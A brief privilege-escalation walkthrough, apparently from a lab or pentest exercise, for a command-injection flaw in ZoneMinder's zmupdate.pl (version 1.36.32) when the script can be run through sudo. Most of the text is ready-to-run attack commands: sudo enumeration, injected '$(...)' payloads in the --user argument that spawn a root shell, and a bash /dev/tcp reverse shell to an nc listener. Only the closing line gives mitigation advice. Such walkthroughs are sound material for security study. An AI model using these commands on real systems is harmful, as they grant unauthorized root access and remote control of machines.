Having the chance to execute ZoneMinder scripts as root we can inject commands. Tested on version 1.36.32+dfsg1-1
Identification
1. Check for privileges or permissions
- sudo -l
2. Use find to locate the scripts
- find / -iname zm*.pl 2> /dev/null
Exploitation (zmupdate.pl)
1. In /usr/bin there are scripts that are part of ZoneMinder
- ls -l /usr/bin/zm*
2. We can try to run zmupdate.pl
- sudo zmupdate.pl –user=’$(touch /tmp/test)’
3. Check the file was created, with root permissions
- ls -l /tmp
4. Now attempt to open a new shell
- sudo /usr/bin/zmupdate.pl –version 1 –user=’$(/bin/bash)’
Extra
1. You may not get a fully functional shell, we know we are root, so we can attempt a reverse shell, start a listener
- nc -lvp 4444
2. Run the reverse shell from the target computer
- bash -i >& /dev/tcp/10.10.14.77/4444 0>&1
3. Check the listener
Recommendations
Have your tools up to date, and, limit the use of these scripts to only the intended users.